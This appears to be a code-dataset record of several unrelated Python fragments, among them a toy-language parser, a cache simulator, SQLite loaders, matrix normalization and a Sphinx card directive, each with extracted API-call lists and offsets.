assert isinstance(end_token, tokens.IdentifierToken) and \
end_token.body == 'end'
assert isinstance(if_token, tokens.IdentifierToken) and \
if_token.body == 'if'
return nodes.IfNode(self.line_num, condition, then_branch, else_branch)
def handle_identifier_true(self, token):
self._debug("Encountered 'true'")
assert token.value.lower() == 'true'
return nodes.BooleanNode(self.line_num, True)
def handle_identifier_false(self, token):
self._debug("Encountered 'false'")
assert token.value.lower() == 'false'
return nodes.BooleanNode(self.line_num, False)
def handle_identifier_return(self, token):
self._debug("Handling return statement")
return_node = self.handle_operator_expression()
return nodes.ReturnNode(self.line_num, return_node)
def handle_identifier_while(self, token):
self._debug("Handling while loop")
condition = self.handle_operator_expression()
branch = nodes.Branch()
try:
while not isinstance(self.next_token, tokens.IdentifierToken) or \
self.next_token.body not in ['end']:
try:
branch.append(self.handle_expression())
except exceptions.EndContextExecution:
logging.error("There shouldn't be a } here "
"because we're in a while statement")
raise exceptions.ParseError(self.line_num, "Unexpected }")
except exceptions.OutOfTokens:
raise exceptions.SaulRuntimeError(self.line_num, "end while expected")
end_token = self.shift_token()
while_token = self.shift_token()
assert isinstance(end_token, tokens.IdentifierToken) and \
end_token.body == 'end'
assert isinstance(while_token, tokens.IdentifierToken) and \
while_token.body == 'while'
return nodes.WhileNode(self.line_num, condition, branch)
def handle_identifier_for(self, token):
self._debug("Handling for loop")
token = self.shift_token()
if not isinstance(token, tokens.IdentifierToken):
raise exceptions.ParseError(self.line_num, "Expected a name, got %s" % token)
var_name = token.body
token = self.shift_token()
if not isinstance(token, tokens.IdentifierToken) or \
token.body != 'in':
raise exceptions.ParseError(self.line_num, "Expected 'in', got %s" % token)
iterable = self.handle_operator_expression()
self._debug("The iterable is %s" % iterable)
branch = nodes.Branch()
try:
while not isinstance(self.next_token, tokens.IdentifierToken) or \
self.next_token.body not in ['end']:
self._debug("For Loop: Consider %s" % self.next_token)
try:
branch.append(self.handle_expression())
self._debug(
"Just handled an expression."
"Branch looks like %s now" % branch)
except exceptions.EndContextExecution:
logging.error("There shouldn't be a } here"
"because we're in a for loop")
raise exceptions.ParseError(self.line_num, "Unexpected }")
except exceptions.OutOfTokens:
raise exceptions.SaulRuntimeError(self.line_num, "end for expected")
end_token = self.shift_token()
for_token = self.shift_token()
self._debug("End token: %s, For token: %s" % (end_token, for_token))
assert isinstance(end_token, tokens.IdentifierToken) and \
end_token.body == 'end'
assert isinstance(for_token, tokens.IdentifierToken) and \
for_token.body == 'for'
self._debug("Returning for loop node")
return nodes.ForNode(self.line_num, var_name, iterable, branch)
|
[
"nodes.BooleanNode",
"nodes.ReturnNode",
"logging.error",
"logging.debug",
"nodes.ListNode",
"nodes.DictionaryNode",
"nodes.VariableNode",
"nodes.Branch",
"nodes.IfNode",
"nodes.NumberNode",
"nodes.InvocationNode",
"nodes.NopNode",
"nodes.ForNode",
"nodes.FunctionNode",
"nodes.WhileNode",
"nodes.StringNode"
] |
[((240, 333), 'logging.debug', 'logging.debug', (["('<Line %d, Token %d> ' % (self.line_num, self.token_counter) + text)", '*args'], {}), "('<Line %d, Token %d> ' % (self.line_num, self.token_counter) +\n text, *args)\n", (253, 333), False, 'import logging\n'), ((1370, 1386), 'nodes.Branch', 'nodes.Branch', (['[]'], {}), '([])\n', (1382, 1386), False, 'import nodes\n'), ((3411, 3425), 'nodes.Branch', 'nodes.Branch', ([], {}), '()\n', (3423, 3425), False, 'import nodes\n'), ((3662, 3738), 'nodes.FunctionNode', 'nodes.FunctionNode', (['self.line_num', 'self.context_class', 'sig_names', 'new_branch'], {}), '(self.line_num, self.context_class, sig_names, new_branch)\n', (3680, 3738), False, 'import nodes\n'), ((5482, 5546), 'nodes.InvocationNode', 'nodes.InvocationNode', (['self.line_num', 'name_token.body', 'arg_tokens'], {}), '(self.line_num, name_token.body, arg_tokens)\n', (5502, 5546), False, 'import nodes\n'), ((5694, 5710), 'nodes.ListNode', 'nodes.ListNode', ([], {}), '()\n', (5708, 5710), False, 'import nodes\n'), ((6652, 6687), 'nodes.DictionaryNode', 'nodes.DictionaryNode', (['self.line_num'], {}), '(self.line_num)\n', (6672, 6687), False, 'import nodes\n'), ((20296, 20312), 'nodes.Branch', 'nodes.Branch', (['[]'], {}), '([])\n', (20308, 20312), False, 'import nodes\n'), ((20335, 20351), 'nodes.Branch', 'nodes.Branch', (['[]'], {}), '([])\n', (20347, 20351), False, 'import nodes\n'), ((22424, 22488), 'nodes.IfNode', 'nodes.IfNode', (['self.line_num', 'condition', 'then_branch', 'else_branch'], {}), '(self.line_num, condition, then_branch, else_branch)\n', (22436, 22488), False, 'import nodes\n'), ((22637, 22675), 'nodes.BooleanNode', 'nodes.BooleanNode', (['self.line_num', '(True)'], {}), '(self.line_num, True)\n', (22654, 22675), False, 'import nodes\n'), ((22827, 22866), 'nodes.BooleanNode', 'nodes.BooleanNode', (['self.line_num', '(False)'], {}), '(self.line_num, False)\n', (22844, 22866), False, 'import nodes\n'), ((23035, 23079), 'nodes.ReturnNode', 'nodes.ReturnNode', (['self.line_num', 'return_node'], {}), '(self.line_num, return_node)\n', (23051, 23079), False, 'import nodes\n'), ((23241, 23255), 'nodes.Branch', 'nodes.Branch', ([], {}), '()\n', (23253, 23255), False, 'import nodes\n'), ((24187, 24236), 'nodes.WhileNode', 'nodes.WhileNode', (['self.line_num', 'condition', 'branch'], {}), '(self.line_num, condition, branch)\n', (24202, 24236), False, 'import nodes\n'), ((24883, 24897), 'nodes.Branch', 'nodes.Branch', ([], {}), '()\n', (24895, 24897), False, 'import nodes\n'), ((26154, 26210), 'nodes.ForNode', 'nodes.ForNode', (['self.line_num', 'var_name', 'iterable', 'branch'], {}), '(self.line_num, var_name, iterable, branch)\n', (26167, 26210), False, 'import nodes\n'), ((4065, 4119), 'nodes.VariableNode', 'nodes.VariableNode', (['self.line_num', 'variable_token.body'], {}), '(self.line_num, variable_token.body)\n', (4083, 4119), False, 'import nodes\n'), ((17047, 17116), 'logging.error', 'logging.error', (['"""Tree stack length is not 1. Contents: %s"""', 'tree_stack'], {}), "('Tree stack length is not 1. Contents: %s', tree_stack)\n", (17060, 17116), False, 'import logging\n'), ((12050, 12068), 'logging.error', 'logging.error', (['msg'], {}), '(msg)\n', (12063, 12068), False, 'import logging\n'), ((18095, 18140), 'nodes.VariableNode', 'nodes.VariableNode', (['self.line_num', 'token.body'], {}), '(self.line_num, token.body)\n', (18113, 18140), False, 'import nodes\n'), ((2140, 2169), 'logging.error', 'logging.error', (['"""Unexpected }"""'], {}), "('Unexpected }')\n", (2153, 2169), False, 'import logging\n'), ((17868, 17906), 'nodes.BooleanNode', 'nodes.BooleanNode', (['self.line_num', '(True)'], {}), '(self.line_num, True)\n', (17885, 17906), False, 'import nodes\n'), ((18219, 18262), 'nodes.NumberNode', 'nodes.NumberNode', (['self.line_num', 'token.body'], {}), '(self.line_num, token.body)\n', (18235, 18262), False, 'import nodes\n'), ((19414, 19442), 'nodes.NopNode', 'nodes.NopNode', (['self.line_num'], {}), '(self.line_num)\n', (19427, 19442), False, 'import nodes\n'), ((20708, 20785), 'logging.error', 'logging.error', (['"""There shouldn\'t be a } here because we\'re in an if statement"""'], {}), '("There shouldn\'t be a } here because we\'re in an if statement")\n', (20721, 20785), False, 'import logging\n'), ((17970, 18009), 'nodes.BooleanNode', 'nodes.BooleanNode', (['self.line_num', '(False)'], {}), '(self.line_num, False)\n', (17987, 18009), False, 'import nodes\n'), ((18341, 18384), 'nodes.StringNode', 'nodes.StringNode', (['self.line_num', 'token.body'], {}), '(self.line_num, token.body)\n', (18357, 18384), False, 'import nodes\n'), ((21612, 21689), 'logging.error', 'logging.error', (['"""There shouldn\'t be a } here because we\'re in an if statement"""'], {}), '("There shouldn\'t be a } here because we\'re in an if statement")\n', (21625, 21689), False, 'import logging\n'), ((23561, 23640), 'logging.error', 'logging.error', (['"""There shouldn\'t be a } here because we\'re in a while statement"""'], {}), '("There shouldn\'t be a } here because we\'re in a while statement")\n', (23574, 23640), False, 'import logging\n'), ((25422, 25493), 'logging.error', 'logging.error', (['"""There shouldn\'t be a } herebecause we\'re in a for loop"""'], {}), '("There shouldn\'t be a } herebecause we\'re in a for loop")\n', (25435, 25493), False, 'import logging\n'), ((16464, 16531), 'logging.error', 'logging.error', (['"""Encountered IndexError. Tree stack: %s"""', 'tree_stack'], {}), "('Encountered IndexError. Tree stack: %s', tree_stack)\n", (16477, 16531), False, 'import logging\n')]
|
import Colour
import Font
import OutputFunctions
from Definitions import *
from graphics.cairo import Draw
from math import ceil
from graphics.cairo.Draw import FillStyle, TextStyle
class Paper:
def __init__(self, width=63*mm, height=39*mm, marker=None):
self.width = width
self.height = height
self.canvas = Draw.Canvas((0, 0), width, height)
if isinstance(marker, Draw.Canvas):
self.canvas.draw(marker, (2*mm, height - 2*mm))
elif marker is not None:
Draw.text(self.canvas, (0, height), marker, TextStyle(Font.very_small, Colour.grey, 'bottom', 'left'))
def split_into_parts(self, max_width, max_height):
def how_many_fit(large, small):
return ceil(large / small)
n_portrait_pages = how_many_fit(self.width, max_width) * how_many_fit(self.height, max_height)
n_landscape_pages = how_many_fit(self.width, max_height) * how_many_fit(self.height, max_width)
if n_landscape_pages < n_portrait_pages:
split_in_parts_horizontally = how_many_fit(self.width, max_height)
split_in_parts_vertically = how_many_fit(self.height, max_width)
else:
split_in_parts_horizontally = how_many_fit(self.width, max_width)
split_in_parts_vertically = how_many_fit(self.height, max_height)
width_map_part = self.width / split_in_parts_horizontally
height_map_part = self.height / split_in_parts_vertically
for column in range(split_in_parts_horizontally):
for row in range(split_in_parts_vertically):
paper_part = Paper(width_map_part, height_map_part)
paper_part.canvas.draw(self.canvas, (-column * width_map_part, -row * height_map_part))
yield paper_part
class Certificate(Paper):
def __init__(self, colour, price=None, name=None, icon=None, marker=None):
super().__init__()
self.colour = colour
c = self.canvas
Draw.rectangle(c, (0, 0), self.width, self.height, FillStyle(colour.faded()))
Draw.rectangle(c, (3*mm, 0), 13*mm, self.height, FillStyle(colour))
if isinstance(marker, Draw.Canvas):
self.canvas.draw(marker, (0, self.height - 3*mm))
elif marker is not None:
Draw.text(self.canvas, (0, self.height), marker, TextStyle(Font.very_small, Colour.grey, 'bottom', 'left'))
if name:
y = self.height/2 if price else 14*mm
OutputFunctions.draw_centered_lines(name, Font.certificate_name, c,
x_c=(self.width + 16*mm)/2, y=y,
width=self.width - 16*mm - 6*mm)
if price:
Draw.text(c, (self.width - 3*mm, 2.8*mm), price,
TextStyle(Font.price, Colour.black, 'top', 'right'))
if icon:
Draw.load_image(c, icon, (9.5*mm, 7*mm), width=10*mm, height=10*mm)
|
[
"graphics.cairo.Draw.FillStyle",
"math.ceil",
"graphics.cairo.Draw.load_image",
"OutputFunctions.draw_centered_lines",
"graphics.cairo.Draw.TextStyle",
"graphics.cairo.Draw.Canvas"
] |
[((340, 374), 'graphics.cairo.Draw.Canvas', 'Draw.Canvas', (['(0, 0)', 'width', 'height'], {}), '((0, 0), width, height)\n', (351, 374), False, 'from graphics.cairo import Draw\n'), ((743, 762), 'math.ceil', 'ceil', (['(large / small)'], {}), '(large / small)\n', (747, 762), False, 'from math import ceil\n'), ((2133, 2150), 'graphics.cairo.Draw.FillStyle', 'FillStyle', (['colour'], {}), '(colour)\n', (2142, 2150), False, 'from graphics.cairo.Draw import FillStyle, TextStyle\n'), ((2492, 2638), 'OutputFunctions.draw_centered_lines', 'OutputFunctions.draw_centered_lines', (['name', 'Font.certificate_name', 'c'], {'x_c': '((self.width + 16 * mm) / 2)', 'y': 'y', 'width': '(self.width - 16 * mm - 6 * mm)'}), '(name, Font.certificate_name, c, x_c=(\n self.width + 16 * mm) / 2, y=y, width=self.width - 16 * mm - 6 * mm)\n', (2527, 2638), False, 'import OutputFunctions\n'), ((2907, 2982), 'graphics.cairo.Draw.load_image', 'Draw.load_image', (['c', 'icon', '(9.5 * mm, 7 * mm)'], {'width': '(10 * mm)', 'height': '(10 * mm)'}), '(c, icon, (9.5 * mm, 7 * mm), width=10 * mm, height=10 * mm)\n', (2922, 2982), False, 'from graphics.cairo import Draw\n'), ((2824, 2875), 'graphics.cairo.Draw.TextStyle', 'TextStyle', (['Font.price', 'Colour.black', '"""top"""', '"""right"""'], {}), "(Font.price, Colour.black, 'top', 'right')\n", (2833, 2875), False, 'from graphics.cairo.Draw import FillStyle, TextStyle\n'), ((569, 626), 'graphics.cairo.Draw.TextStyle', 'TextStyle', (['Font.very_small', 'Colour.grey', '"""bottom"""', '"""left"""'], {}), "(Font.very_small, Colour.grey, 'bottom', 'left')\n", (578, 626), False, 'from graphics.cairo.Draw import FillStyle, TextStyle\n'), ((2353, 2410), 'graphics.cairo.Draw.TextStyle', 'TextStyle', (['Font.very_small', 'Colour.grey', '"""bottom"""', '"""left"""'], {}), "(Font.very_small, Colour.grey, 'bottom', 'left')\n", (2362, 2410), False, 'from graphics.cairo.Draw import FillStyle, TextStyle\n')]
|
import cacheL1
import cacheL1Controller
import clock
import threading
import random
from time import sleep
class core:
isa = ['read', 'write', 'calc']
state = 'awake'
class processor(threading.Thread):
countInstructions = 1
processTime = 1
def __init__(self, coreID, chipID, clock, cacheL1, cacheL1Controller, update):
self.coreID = coreID
self.chipID = chipID
self.clock = clock
self.cacheL1 = cacheL1
self.cacheL1Controller = cacheL1Controller
self.standBy = threading.Condition()
self.cacheL1Controller.addPause(self.standBy)
self.update = update
threading.Thread.__init__(self)
def process(self):
sleep(self.processTime)
self.update(self.coreID, 'rates')
def run(self):
while(True):
if(self.clock.play):
instruction = core.generateInstruction()
self.countInstructions += 1
command = "# Clicle: {} Instruction: {} ->\n {} ".format(self.clock.countCicle, self.countInstructions, instruction)
if (instruction in ['read', 'write']):
mainMemAdd = random.randrange(16)
command += "Address: {} CoreId: {} ChipId: {}".format(mainMemAdd, self.coreID, self.chipID)
self.update(self.coreID, 'log', log = command)
if(instruction == 'read'):
self.cacheL1Controller.rea
# Core Constructor
def __init__(self, coreID, chipID, clock, update):
self.coreID = coreID
self.chipID = chipID
self.clock = clock
self.update = update
# Start
def start(self):
self.processor.start()
# Get instruction
@staticmethod
def generateInstruction():
# Special Distribution Function
return core.isa[random.randrange(3)]
|
[
"threading.Thread.__init__",
"threading.Condition",
"random.randrange",
"time.sleep"
] |
[((573, 594), 'threading.Condition', 'threading.Condition', ([], {}), '()\n', (592, 594), False, 'import threading\n'), ((698, 729), 'threading.Thread.__init__', 'threading.Thread.__init__', (['self'], {}), '(self)\n', (723, 729), False, 'import threading\n'), ((770, 793), 'time.sleep', 'sleep', (['self.processTime'], {}), '(self.processTime)\n', (775, 793), False, 'from time import sleep\n'), ((1980, 1999), 'random.randrange', 'random.randrange', (['(3)'], {}), '(3)\n', (1996, 1999), False, 'import random\n'), ((1268, 1288), 'random.randrange', 'random.randrange', (['(16)'], {}), '(16)\n', (1284, 1288), False, 'import random\n')]
|
import os
import sqlite3
import pandas as pd
import numpy as np
from .pybash import get_file_info
def connect_to_db(path):
"""
Interact with a SQLite database
Parameters
----------
path: str
Location of the SQLite database
Returns
-------
conn: Connector
The SQLite connection object
curs: Cursor
The SQLite cursor object
Usage
-----
conn, curs = connect_to_db("data/raw/foo.db")
"""
try:
if os.path.exists(path):
print("Connecting to Existing DB")
conn = sqlite3.connect(path)
else:
print("Initialising new SQLite DB")
conn = sqlite3.connect(path)
curs = conn.cursor()
except:
print("An error occured. Please check the file path")
return conn, curs
def print_table_names(path_to_db):
"""
Print and return the names of tables in a SQLite database
"""
conn, curs = connect_to_db(path_to_db)
result = curs.execute("SELECT name FROM sqlite_master WHERE type='table'").fetchall()
print(result)
return result
def load_file_to_db(path_to_file, path_to_db, table_name, delim):
"""
Load a text file of any size into a SQLite database
Parameters
----------
path_to_file: str
Location of the text file
path_to_db: str
Location of the SQLite db
table_name: str
Name of the table to be created in the database
delim: str
The delimiter for the text file
Returns
-------
None
"""
conn, curs = connect_to_db(path_to_db)
print("The database at {} contains the following tables.".format(path_to_db))
print(curs.execute("SELECT name FROM sqlite_master WHERE type='table'").fetchall())
if os.path.exists(path_to_file):
size_ = get_file_info(path_to_file).get('size')
rows_ = get_file_info(path_to_file).get('rows')
try:
if size_ < 250:
print("{} is a small file. Importing directly.".format(path_to_file))
df_ = pd.read_csv(
path_to_file,
sep=delim,
low_memory=False,
error_bad_lines=False,
quoting=csv.QUOTE_NONE
)
df_.to_sql(
name=table_name,
con=conn,
index=False,
if_exists='append'
)
print("Done.")
else:
print("{} is large. Importing in chunks.".format(path_to_file))
csize = int(np.ceil(rows_/10))
chunks = pd.read_csv(
path_to_file,
sep=delim,
chunksize=csize,
error_bad_lines=False,
low_memory=False,
quoting=csv.QUOTE_NONE
)
for c in chunks:
c.to_sql(
name=table_name,
con=conn,
index=False,
if_exists='append'
)
print("Done")
except:
print("An error occurred while reading the file.")
else:
print("File not found at {}, please check the path".format(path_to_file))
return None
|
[
"pandas.read_csv",
"sqlite3.connect",
"os.path.exists",
"numpy.ceil"
] |
[((1773, 1801), 'os.path.exists', 'os.path.exists', (['path_to_file'], {}), '(path_to_file)\n', (1787, 1801), False, 'import os\n'), ((486, 506), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (500, 506), False, 'import os\n'), ((574, 595), 'sqlite3.connect', 'sqlite3.connect', (['path'], {}), '(path)\n', (589, 595), False, 'import sqlite3\n'), ((677, 698), 'sqlite3.connect', 'sqlite3.connect', (['path'], {}), '(path)\n', (692, 698), False, 'import sqlite3\n'), ((2064, 2170), 'pandas.read_csv', 'pd.read_csv', (['path_to_file'], {'sep': 'delim', 'low_memory': '(False)', 'error_bad_lines': '(False)', 'quoting': 'csv.QUOTE_NONE'}), '(path_to_file, sep=delim, low_memory=False, error_bad_lines=\n False, quoting=csv.QUOTE_NONE)\n', (2075, 2170), True, 'import pandas as pd\n'), ((2679, 2801), 'pandas.read_csv', 'pd.read_csv', (['path_to_file'], {'sep': 'delim', 'chunksize': 'csize', 'error_bad_lines': '(False)', 'low_memory': '(False)', 'quoting': 'csv.QUOTE_NONE'}), '(path_to_file, sep=delim, chunksize=csize, error_bad_lines=False,\n low_memory=False, quoting=csv.QUOTE_NONE)\n', (2690, 2801), True, 'import pandas as pd\n'), ((2635, 2654), 'numpy.ceil', 'np.ceil', (['(rows_ / 10)'], {}), '(rows_ / 10)\n', (2642, 2654), True, 'import numpy as np\n')]
|
import json
from collections import namedtuple
def _json_object_hook(d):
return namedtuple('X', d.keys())(*d.values())
def json2obj(data):
a = json.dumps(data)
return json.loads(a, object_hook=_json_object_hook)
|
[
"json.loads",
"json.dumps"
] |
[((149, 165), 'json.dumps', 'json.dumps', (['data'], {}), '(data)\n', (159, 165), False, 'import json\n'), ((175, 219), 'json.loads', 'json.loads', (['a'], {'object_hook': '_json_object_hook'}), '(a, object_hook=_json_object_hook)\n', (185, 219), False, 'import json\n')]
|
"""
script to matrix normalization
"""
from functools import reduce
import math as m
import numpy as np
def minmax_normalization(x, type):
"""
:param x: column of matrix data
:param type: type of normalization
:return: min max normalized column of matrix data
"""
if min(x) == max(x):
return np.ones(x.shape)
if type == 'cost':
return (max(x) - x) / (max(x) - min(x))
return (x - min(x)) / (max(x) - min(x))
def max_normalization(x, type):
"""
:param x: column of matrix data
:param type: type of normalization
:return: max normalized column of matrix data
"""
if type == 'cost':
return 1 - x/max(x)
return x / max(x)
def sum_normalization(x, type):
"""
:param x: column of matrix data
:param type: type of normalization
:return: sum normalized column of matrix data
"""
if type == 'cost':
return (1/x) / sum(1/x)
return x / sum(x)
def vector_normalization(x, type):
"""
:param x: column of matrix data
:param type: type of normalization
:return: vector normalized column of matrix data
"""
if type == 'cost':
return 1 - (x / np.sqrt(sum(x ** 2)))
return x / np.sqrt(sum(x ** 2))
def logaritmic_normalization(x, type):
"""
:param x: column of matrix data
:param type: type of normalization
:return: logarithmic normalized column of matrix data
"""
prod = reduce(lambda a, b: a*b, x)
if type == 'cost':
return (1 - (np.log(x) / m.log(prod))) / (len(x) - 1)
return np.log(x) / m.log(prod)
def normalize(matrix, types, method, precision = 2):
"""
:param matrix: decision matrix
:param types: types of normalization for columns
:param method: method of normalization
:param precision: precision
:return: normalized matrix
"""
if matrix.shape[1] != len(types):
print('Sizes does not match')
normalized_matrix = matrix.astype('float')
for i in range(len(types)):
if type == 1:
normalized_matrix[:, i] = np.round(method(matrix[:, i], types[i]), precision)
else:
normalized_matrix[:, i] = np.round(method(matrix[:, i], types[i]), precision)
return normalized_matrix
|
[
"functools.reduce",
"numpy.log",
"numpy.ones",
"math.log"
] |
[((1453, 1482), 'functools.reduce', 'reduce', (['(lambda a, b: a * b)', 'x'], {}), '(lambda a, b: a * b, x)\n', (1459, 1482), False, 'from functools import reduce\n'), ((328, 344), 'numpy.ones', 'np.ones', (['x.shape'], {}), '(x.shape)\n', (335, 344), True, 'import numpy as np\n'), ((1577, 1586), 'numpy.log', 'np.log', (['x'], {}), '(x)\n', (1583, 1586), True, 'import numpy as np\n'), ((1589, 1600), 'math.log', 'm.log', (['prod'], {}), '(prod)\n', (1594, 1600), True, 'import math as m\n'), ((1525, 1534), 'numpy.log', 'np.log', (['x'], {}), '(x)\n', (1531, 1534), True, 'import numpy as np\n'), ((1537, 1548), 'math.log', 'm.log', (['prod'], {}), '(prod)\n', (1542, 1548), True, 'import math as m\n')]
|
"""
Fix from Twisted r23970
"""
from twisted.internet.task import deferLater
from twisted.protocols.loopback import _loopbackAsyncBody
def _loopbackAsyncContinue(ignored, server, serverToClient, client, clientToServer):
# Clear the Deferred from each message queue, since it has already fired
# and cannot be used again.
clientToServer._notificationDeferred = serverToClient._notificationDeferred = None
# Schedule some more byte-pushing to happen. This isn't done
# synchronously because no actual transport can re-enter dataReceived as
# a result of calling write, and doing this synchronously could result
# in that.
from twisted.internet import reactor
return deferLater(
reactor, 0,
_loopbackAsyncBody, server, serverToClient, client, clientToServer)
def install():
from twisted.protocols import loopback
loopback._loopbackAsyncContinue = _loopbackAsyncContinue
|
[
"twisted.internet.task.deferLater"
] |
[((707, 801), 'twisted.internet.task.deferLater', 'deferLater', (['reactor', '(0)', '_loopbackAsyncBody', 'server', 'serverToClient', 'client', 'clientToServer'], {}), '(reactor, 0, _loopbackAsyncBody, server, serverToClient, client,\n clientToServer)\n', (717, 801), False, 'from twisted.internet.task import deferLater\n')]
|
# Library used to return the content of a URL
from urllib.request import Request, urlopen
# Library to decode text to JSON
import json
class SW_stops_amount:
def __init__(self):
pass
# Decodes the consumables
def calc(self, strConsumables):
intHOURS_IN_YEAR = 8760
intHOURS_IN_MONTH = 730
intHOURS_IN_WEEK = 168
intHOURS_IN_DAY = 24
# Gets the number part of the string
strValue = ''
for s in strConsumables.split():
if s.isdigit():
strValue += s
intNumber = int(strValue)
# Interprets the text part in consumables
if 'day' in strConsumables:
return intNumber * intHOURS_IN_DAY
if 'week' in strConsumables:
return intNumber * intHOURS_IN_WEEK
if 'month' in strConsumables:
return intNumber * intHOURS_IN_MONTH
if 'year' in strConsumables:
return intNumber * intHOURS_IN_YEAR
def get_amount(self, intDistance, strConsumables, strMGLT):
return int(intDistance / (self.calc(strConsumables) * int(strMGLT)))
# Prints the amount of stops given the ship and distance
def analyze_ship(self, ship, intDistance):
# Calculates the amount of stops
strName = ship['name']
strConsumables = ship['consumables']
strMGLT = ship['MGLT']
# Can't calculate when certain values are missing
if strConsumables != 'unknown' and strMGLT != 'unknown':
intAmountOfStops = self.get_amount(intDistance, strConsumables, strMGLT)
print('Ship: "{}", Amount of stops: {}'.format(strName, intAmountOfStops))
else:
print('Ship: "{}", Consumables and/or MGLT are unknown.'.format(strName))
def run(self):
# Header
print('Amount of Stops Calculator for SW Ships')
print()
# Asks the user for a value
bAskingForInput = True
while bAskingForInput:
try:
print('How far are you heading? Insert a numerical value for a distance in MGLT.')
strInput = input()
intDistance = int(strInput)
bAskingForInput = False
except:
print('The inserted value "{}" is invalid as a number. Try again.'.format(strInput))
print()
strURL_SWAPI_STARSHIPS = 'https://swapi.co/api/starships/'
print('Downloading data from {}...'.format(strURL_SWAPI_STARSHIPS))
print()
# Controls how many pages should be read
bThereIsMoreData = True;
intAmountOfShips = 0
while bThereIsMoreData:
# Gets the starships and their data
req = Request(strURL_SWAPI_STARSHIPS, headers={'User-Agent': 'Mozilla/5.0'})
content = urlopen(req).read()
data = json.loads(content.decode())
# Does the calc for each starship
for ship in data['results']:
intAmountOfShips += 1
self.analyze_ship(ship, intDistance)
strURL_SWAPI_STARSHIPS = data['next']
bThereIsMoreData = strURL_SWAPI_STARSHIPS is not None;
print()
input('{} ships in total. Hit ENTER to finish.'.format(intAmountOfShips))
App = SW_stops_amount()
if __name__ == '__main__':
App.run()
|
[
"urllib.request.Request",
"urllib.request.urlopen"
] |
[((2826, 2896), 'urllib.request.Request', 'Request', (['strURL_SWAPI_STARSHIPS'], {'headers': "{'User-Agent': 'Mozilla/5.0'}"}), "(strURL_SWAPI_STARSHIPS, headers={'User-Agent': 'Mozilla/5.0'})\n", (2833, 2896), False, 'from urllib.request import Request, urlopen\n'), ((2920, 2932), 'urllib.request.urlopen', 'urlopen', (['req'], {}), '(req)\n', (2927, 2932), False, 'from urllib.request import Request, urlopen\n')]
|
import re
from typing import List, NamedTuple, Optional, Tuple
from docutils import nodes
from docutils.parsers.rst import directives
from docutils.statemachine import StringList
from sphinx import addnodes
from sphinx.application import Sphinx
from sphinx.util.docutils import SphinxDirective
from sphinx.util.logging import getLogger
from .shared import (
WARNING_TYPE,
PassthroughTextElement,
create_component,
is_component,
make_choice,
margin_option,
text_align,
)
LOGGER = getLogger(__name__)
DIRECTIVE_NAME_CARD = "card"
DIRECTIVE_NAME_CAROUSEL = "card-carousel"
REGEX_HEADER = re.compile(r"^\^{3,}\s*$")
REGEX_FOOTER = re.compile(r"^\+{3,}\s*$")
def setup_cards(app: Sphinx) -> None:
"""Setup the card components."""
app.add_directive(DIRECTIVE_NAME_CARD, CardDirective)
app.add_directive(DIRECTIVE_NAME_CAROUSEL, CardCarouselDirective)
class CardContent(NamedTuple):
"""Split card into header (optional), body, footer (optional).
(offset, content)
"""
body: Tuple[int, StringList]
header: Optional[Tuple[int, StringList]] = None
footer: Optional[Tuple[int, StringList]] = None
class CardDirective(SphinxDirective):
"""A card component."""
has_content = True
required_arguments = 0
optional_arguments = 1 # card title
final_argument_whitespace = True
option_spec = {
"width": make_choice(["auto", "25%", "50%", "75%", "100%"]),
"margin": margin_option,
"text-align": text_align,
"img-top": directives.uri,
"img-bottom": directives.uri,
"img-background": directives.uri,
"link": directives.uri,
"link-type": make_choice(["url", "any", "ref", "doc"]),
"shadow": make_choice(["none", "sm", "md", "lg"]),
"class-card": directives.class_option,
"class-header": directives.class_option,
"class-body": directives.class_option,
"class-title": directives.class_option,
"class-footer": directives.class_option,
}
def run(self) -> List[nodes.Node]:
return [self.create_card(self, self.arguments, self.options)]
@classmethod
def create_card(
cls, inst: SphinxDirective, arguments: Optional[list], options: dict
) -> nodes.Node:
"""Run the directive."""
# TODO better degradation for latex
card_classes = ["sd-card", "sd-sphinx-override"]
if "width" in options:
card_classes += [f'sd-w-{options["width"].rstrip("%")}']
card_classes += options.get("margin", ["sd-mb-3"])
card_classes += [f"sd-shadow-{options.get('shadow', 'sm')}"]
if "link" in options:
card_classes += ["sd-card-hover"]
card = create_component(
"card",
card_classes
+ options.get("text-align", [])
+ options.get("class-card", []),
)
inst.set_source_info(card)
container = card
if "img-background" in options:
card.append(
nodes.image(
uri=options["img-background"],
classes=["sd-card-img"],
alt="background image",
)
)
overlay = create_component("card-overlay", ["sd-card-img-overlay"])
inst.set_source_info(overlay)
card += overlay
container = overlay
if "img-top" in options:
image_top = nodes.image(
"",
uri=options["img-top"],
alt="card-img-top",
classes=["sd-card-img-top"],
)
container.append(image_top)
components = cls.split_content(inst.content, inst.content_offset)
if components.header:
container.append(
cls._create_component(
inst, "header", options, components.header[0], components.header[1]
)
)
body = cls._create_component(
inst, "body", options, components.body[0], components.body[1]
)
if arguments:
title = create_component(
"card-title",
["sd-card-title", "sd-font-weight-bold"]
+ options.get("class-title", []),
)
textnodes, _ = inst.state.inline_text(arguments[0], inst.lineno)
title.extend(textnodes)
body.insert(0, title)
container.append(body)
if components.footer:
container.append(
cls._create_component(
inst, "footer", options, components.footer[0], components.footer[1]
)
)
if "img-bottom" in options:
image_bottom = nodes.image(
"",
uri=options["img-bottom"],
alt="card-img-bottom",
classes=["sd-card-img-bottom"],
)
container.append(image_bottom)
if "link" in options:
link_container = PassthroughTextElement()
if options.get("link-type", "url") == "url":
link = nodes.reference(
"",
"",
refuri=options["link"],
classes=["sd-stretched-link"],
)
else:
options = {
# TODO the presence of classes raises an error if the link cannot be found
"classes": ["sd-stretched-link"],
"reftarget": options["link"],
"refdoc": inst.env.docname,
"refdomain": "" if options["link-type"] == "any" else "std",
"reftype": options["link-type"],
"refexplicit": True,
"refwarn": True,
}
link = addnodes.pending_xref("", nodes.Text(""), **options)
inst.set_source_info(link)
link_container += link
container.append(link_container)
return card
@staticmethod
def split_content(content: StringList, offset: int) -> CardContent:
"""Split the content into header, body and footer."""
header_index, footer_index, header, footer = None, None, None, None
body_offset = offset
for index, line in enumerate(content):
# match the first occurrence of a header regex
if (header_index is None) and REGEX_HEADER.match(line):
header_index = index
# match the final occurrence of a footer regex
if REGEX_FOOTER.match(line):
footer_index = index
if header_index is not None:
header = (offset, content[:header_index])
body_offset += header_index + 1
if footer_index is not None:
footer = (offset + footer_index + 1, content[footer_index + 1 :])
body = (
body_offset,
content[
(header_index + 1 if header_index is not None else None) : footer_index
],
)
return CardContent(body, header, footer)
@classmethod
def _create_component(
cls,
inst: SphinxDirective,
name: str,
options: dict,
offset: int,
content: StringList,
) -> nodes.container:
